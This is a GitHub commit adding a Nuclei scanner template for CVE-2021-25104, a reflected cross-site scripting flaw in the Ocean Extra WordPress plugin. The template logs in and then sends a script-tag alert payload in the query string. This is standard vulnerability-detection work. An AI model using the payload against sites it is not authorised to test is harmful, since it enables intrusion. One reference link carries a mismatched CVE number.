Merge pull request #5447 from projectdiscovery/CVE-2021-25104

Create CVE-2021-25104.yaml
patch-1
Prince Chaddha 2022-09-23 13:59:48 +05:30 committed by GitHub
commit 4ba9fafaa1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 50 additions and 0 deletions

View File

@ -0,0 +1,50 @@
id: CVE-2021-25104
info:
name: Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting
author: Akincibor
severity: medium
description: The plugin does not escape generated links which are then used when the OceanWP theme is active, leading to a Reflected Cross-Site Scripting issue.
remediation: Fixed in version 1.9.5
reference:
- https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558
- https://wordpress.org/plugins/ocean-extra/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25104
- https://nvd.nist.gov/vuln/detail/CVE-2021-25104
metadata:
verified: true
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/?step=demo&page=owp_setup&a"><script>alert(/XSS/)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'OceanWP'
- '><script>alert(/XSS/)</script>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200